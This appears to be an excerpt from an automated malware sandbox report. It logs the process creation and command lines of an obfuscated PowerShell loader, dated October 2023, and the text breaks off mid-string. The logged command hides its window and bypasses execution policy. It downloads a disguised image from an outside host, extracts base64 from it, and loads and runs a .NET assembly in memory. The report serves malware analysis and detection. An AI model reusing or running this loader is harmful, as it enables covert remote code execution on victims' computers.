GtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceQwBvUHOWdGtçceG4UHOWdGtçcedgBlUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBdUHOWdGtçceDoUHOWdGtçceOgBGUHOWdGtçceHIUHOWdGtçcebwBtUHOWdGtçceEIUHOWdGtçceYQBzUHOWdGtçceGUUHOWdGtçceNgUHOWdGtçce0UHOWdGtçceFMUHOWdGtçcedUHOWdGtçceByUHOWdGtçceGkUHOWdGtçcebgBnUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZQBkUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceUgBlUHOWdGtçceGYUHOWdGtçcebUHOWdGtçceBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBpUHOWdGtçceG8UHOWdGtçcebgUHOWdGtçceuUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQBdUHOWdGtçceDoUHOWdGtçceOgBMUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceB0UHOWdGtçceHkUHOWdGtçcecUHOWdGtçceBlUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcebUHOWdGtçceBvUHOWdGtçceGEUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGQUHOWdGtçceQQBzUHOWdGtçceHMUHOWdGtçceZQBtUHOWdGtçceGIUHOWdGtçcebUHOWdGtçceB5UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceVUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCcUHOWdGtçceRgBpUHOWdGtçceGIUHOWdGtçceZQByUHOWdGtçceC4UHOWdGtçceSUHOWdGtçceBvUHOWdGtçceG0UHOWdGtçceZQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceG0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcedUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceuUHOWdGtçceEcUHOWdGtçceZQB0UHOWdGtçceE0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCgUHOWdGtçceJwBWUHOWdGtçceEEUHOWdGtçceSQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçcedgBvUHOWdGtçceGsUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcebgB1UHOWdGtçceGwUHOWdGtçcebUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceWwBvUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBbUHOWdGtçceF0UHOWdGtçceXQUHOWdGtçcegUHOWdGtçceCgUHOWdGtçceJwBkUHOWdGtçceEgUHOWdGtçceaUHOWdGtçceUHOWdGtçcewUHOWdGtçceEwUHOWdGtçcebUHOWdGtçceBKUHOWdGtçceFUUHOWdGtçceUwBDUHOWdGtçceDkUHOWdGtçceegBkUHOWdGtçceDIUHOWdGtçceOQBrUHOWdGtçceGIUHOWdGtçcebQBsUHOWdGtçceDMUHOWdGtçceTUHOWdGtçceB6UHOWdGtçceFEUHOWdGtçceMQBNUHOWdGtçceFMUHOWdGtçceNUHOWdGtçceUHOWdGtçcewUHOWdGtçceE4UHOWdGtçceaQUHOWdGtçce0UHOWdGtçceHoUHOWdGtçceTUHOWdGtçceBqUHOWdGtçceEkUHOWdGtçceNQBNUHOWdGtçceFMUHOWdGtçceOUHOWdGtçceB2UHOWdGtçceE8UHOWdGtçcebgBCUHOWdGtçceDUHOWdGtçceUHOWdGtçceZUHOWdGtçceBHUHOWdGtçceGcUHOWdGtçcePQUHOWdGtçcenUHOWdGtçceCUHOWdGtçceUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceDIUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceHIUHOWdGtçceZQBnUHOWdGtçceGEUHOWdGtçcecwBtUHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce1UHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBDUHOWdGtçceDoUHOWdGtçceXUHOWdGtçceBXUHOWdGtçceGkUHOWdGtçcebgBkUHOWdGtçceG8UHOWdGtçcedwBzUHOWdGtçceFwUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceG0UHOWdGtçcecUHOWdGtçceBcUHOWdGtçceCcUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceaUHOWdGtçceB0UHOWdGtçceG0UHOWdGtçcebUHOWdGtçceBjUHOWdGtçceCcUHOWdGtçceKQUHOWdGtçcepUHOWdGtçceUHOWdGtçce==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UHOWdGtçce','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_image.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LlJUSC9zd29kbml3LzQ1MS40Ni4zLjI5MS8vOnB0dGg=' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlc'))"

A process created a hidden window (5 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Oct. 26, 2023, 5:18 p.m.	thread_identifier: 2204 thread_handle: 0x00000330 process_identifier: 932 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVQByUHOWdGtçceGwUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBoUHOWdGtçceHQUHOWdGtçcedUHOWdGtçceBwUHOWdGtçceHMUHOWdGtçceOgUHOWdGtçcevUHOWdGtçceC8UHOWdGtçcedQBwUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBuUHOWdGtçceHMUHOWdGtçceLgBjUHOWdGtçceG8UHOWdGtçcebQUHOWdGtçceuUHOWdGtçceGIUHOWdGtçcecgUHOWdGtçcevUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBzUHOWdGtçceC8UHOWdGtçceMUHOWdGtçceUHOWdGtçcewUHOWdGtçceDQUHOWdGtçceLwUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceNUHOWdGtçceUHOWdGtçcevUHOWdGtçceDcUHOWdGtçceNUHOWdGtçceUHOWdGtçce5UHOWdGtçceC8UHOWdGtçcebwByUHOWdGtçceGkUHOWdGtçceZwBpUHOWdGtçceG4UHOWdGtçceYQBsUHOWdGtçceC8UHOWdGtçcebgBlUHOWdGtçceHcUHOWdGtçceXwBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceLgBqUHOWdGtçceHUHOWdGtçceUHOWdGtçceZwUHOWdGtçce/UHOWdGtçceDEUHOWdGtçceNgUHOWdGtçce5UHOWdGtçceDgUHOWdGtçceMUHOWdGtçceUHOWdGtçce4UHOWdGtçceDQUHOWdGtçceNQUHOWdGtçceyUHOWdGtçceDMUHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcedwBlUHOWdGtçceGIUHOWdGtçceQwBsUHOWdGtçceGkUHOWdGtçceZQBuUHOWdGtçceHQUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceTgBlUHOWdGtçceHcUHOWdGtçceLQBPUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceTgBlUHOWdGtçceHQUHOWdGtçceLgBXUHOWdGtçceGUUHOWdGtçceYgBDUHOWdGtçceGwUHOWdGtçceaQBlUHOWdGtçceG4UHOWdGtçcedUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceHcUHOWdGtçceZQBiUHOWdGtçceEMUHOWdGtçcebUHOWdGtçceBpUHOWdGtçceGUUHOWdGtçcebgB0UHOWdGtçceC4UHOWdGtçceRUHOWdGtçceBvUHOWdGtçceHcUHOWdGtçcebgBsUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceEQUHOWdGtçceYQB0UHOWdGtçceGEUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBVUHOWdGtçceHIUHOWdGtçcebUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçceuUHOWdGtçceEUUHOWdGtçcebgBjUHOWdGtçceG8UHOWdGtçceZUHOWdGtçceBpUHOWdGtçceG4UHOWdGtçceZwBdUHOWdGtçceDoUHOWdGtçceOgBVUHOWdGtçceFQUHOWdGtçceRgUHOWdGtçce4UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceUwB0UHOWdGtçceHIUHOWdGtçceaQBuUHOWdGtçceGcUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBCUHOWdGtçceHkUHOWdGtçcedUHOWdGtçceBlUHOWdGtçceHMUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBTUHOWdGtçceFQUHOWdGtçceQQBSUHOWdGtçceFQUHOWdGtçcePgUHOWdGtçce+UHOWdGtçceCcUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGUUHOWdGtçcebgBkUHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBFUHOWdGtçceE4UHOWdGtçceRUHOWdGtçceUHOWdGtçce+UHOWdGtçceD4UHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBUUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceB0UHOWdGtçceC4UHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceE8UHOWdGtçceZgUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceZQBuUHOWdGtçceGQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceTwBmUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBGUHOWdGtçceGwUHOWdGtçceYQBnUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceHMUHOWdGtçcedUHOWdGtçceBhUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçceZQUHOWdGtçcegUHOWdGtçceDUHOWdGtçceUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceCsUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceLgBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceYgBhUHOWdGtçceHMUHOWdGtçceZQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceTUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZwB0UHOWdGtçceGgUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBzUHOWdGtçceHQUHOWdGtçceYQByUHOWdGtçceHQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBTUHOWdGtçceHUUHOWdGtçceYgBzUHOWdGtçceHQUHOWdGtçcecgBpUHOWdGtçceG4UHOWdGtçceZwUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceQwBvUHOWdGtçceG4UHOWdGtçcedgBlUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBdUHOWdGtçceDoUHOWdGtçceOgBGUHOWdGtçceHIUHOWdGtçcebwBtUHOWdGtçceEIUHOWdGtçceYQBzUHOWdGtçceGUUHOWdGtçceNgUHOWdGtçce0UHOWdGtçceFMUHOWdGtçcedUHOWdGtçceByUHOWdGtçceGkUHOWdGtçcebgBnUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZQBkUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceUgBlUHOWdGtçceGYUHOWdGtçcebUHOWdGtçceBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBpUHOWdGtçceG8UHOWdGtçcebgUHOWdGtçceuUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQBdUHOWdGtçceDoUHOWdGtçceOgBMUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceB0UHOWdGtçceHkUHOWdGtçcecUHOWdGtçceBlUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcebUHOWdGtçceBvUHOWdGtçceGEUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGQUHOWdGtçceQQBzUHOWdGtçceHMUHOWdGtçceZQBtUHOWdGtçceGIUHOWdGtçcebUHOWdGtçceB5UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceVUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCcUHOWdGtçceRgBpUHOWdGtçceGIUHOWdGtçceZQByUHOWdGtçceC4UHOWdGtçceSUHOWdGtçceBvUHOWdGtçceG0UHOWdGtçceZQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceG0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcedUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceuUHOWdGtçceEcUHOWdGtçceZQB0UHOWdGtçceE0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCgUHOWdGtçceJwBWUHOWdGtçceEEUHOWdGtçceSQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçcedgBvUHOWdGtçceGsUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcebgB1UHOWdGtçceGwUHOWdGtçcebUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceWwBvUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBbUHOWdGtçceF0UHOWdGtçceXQUHOWdGtçcegUHOWdGtçceCgUHOWdGtçceJwBkUHOWdGtçceEgUHOWdGtçceaUHOWdGtçceUHOWdGtçcewUHOWdGtçceEwUHOWdGtçcebUHOWdGtçceBKUHOWdGtçceFUUHOWdGtçceUwBDUHOWdGtçceDkUHOWdGtçceegBkUHOWdGtçceDIUHOWdGtçceOQBrUHOWdGtçceGIUHOWdGtçcebQBsUHOWdGtçceDMUHOWdGtçceTUHOWdGtçceB6UHOWdGtçceFEUHOWdGtçceMQBNUHOWdGtçceFMUHOWdGtçceNUHOWdGtçceUHOWdGtçcewUHOWdGtçceE4UHOWdGtçceaQUHOWdGtçce0UHOWdGtçceHoUHOWdGtçceTUHOWdGtçceBqUHOWdGtçceEkUHOWdGtçceNQBNUHOWdGtçceFMUHOWdGtçceOUHOWdGtçceB2UHOWdGtçceE8UHOWdGtçcebgBCUHOWdGtçceDUHOWdGtçceUHOWdGtçceZUHOWdGtçceBHUHOWdGtçceGcUHOWdGtçcePQUHOWdGtçcenUHOWdGtçceCUHOWdGtçceUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceDIUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceHIUHOWdGtçceZQBnUHOWdGtçceGEUHOWdGtçcecwBtUHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce1UHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBDUHOWdGtçceDoUHOWdGtçceXUHOWdGtçceBXUHOWdGtçceGkUHOWdGtçcebgBkUHOWdGtçceG8UHOWdGtçcedwBzUHOWdGtçceFwUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceG0UHOWdGtçcecUHOWdGtçceBcUHOWdGtçceCcUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceaUHOWdGtçceB0UHOWdGtçceG0UHOWdGtçcebUHOWdGtçceBjUHOWdGtçceCcUHOWdGtçceKQUHOWdGtçcepUHOWdGtçceUHOWdGtçce==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UHOWdGtçce','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000338	1	1
ShellExecuteExW Oct. 26, 2023, 5:18 p.m.	show_type: 0 filepath_r: powershell parameters: -command "$Codigo = 'JUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVQByUHOWdGtçceGwUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBoUHOWdGtçceHQUHOWdGtçcedUHOWdGtçceBwUHOWdGtçceHMUHOWdGtçceOgUHOWdGtçcevUHOWdGtçceC8UHOWdGtçcedQBwUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBuUHOWdGtçceHMUHOWdGtçceLgBjUHOWdGtçceG8UHOWdGtçcebQUHOWdGtçceuUHOWdGtçceGIUHOWdGtçcecgUHOWdGtçcevUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBzUHOWdGtçceC8UHOWdGtçceMUHOWdGtçceUHOWdGtçcewUHOWdGtçceDQUHOWdGtçceLwUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceNUHOWdGtçceUHOWdGtçcevUHOWdGtçceDcUHOWdGtçceNUHOWdGtçceUHOWdGtçce5UHOWdGtçceC8UHOWdGtçcebwByUHOWdGtçceGkUHOWdGtçceZwBpUHOWdGtçceG4UHOWdGtçceYQBsUHOWdGtçceC8UHOWdGtçcebgBlUHOWdGtçceHcUHOWdGtçceXwBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceLgBqUHOWdGtçceHUHOWdGtçceUHOWdGtçceZwUHOWdGtçce/UHOWdGtçceDEUHOWdGtçceNgUHOWdGtçce5UHOWdGtçceDgUHOWdGtçceMUHOWdGtçceUHOWdGtçce4UHOWdGtçceDQUHOWdGtçceNQUHOWdGtçceyUHOWdGtçceDMUHOWdGtçceJwUHOWdGtç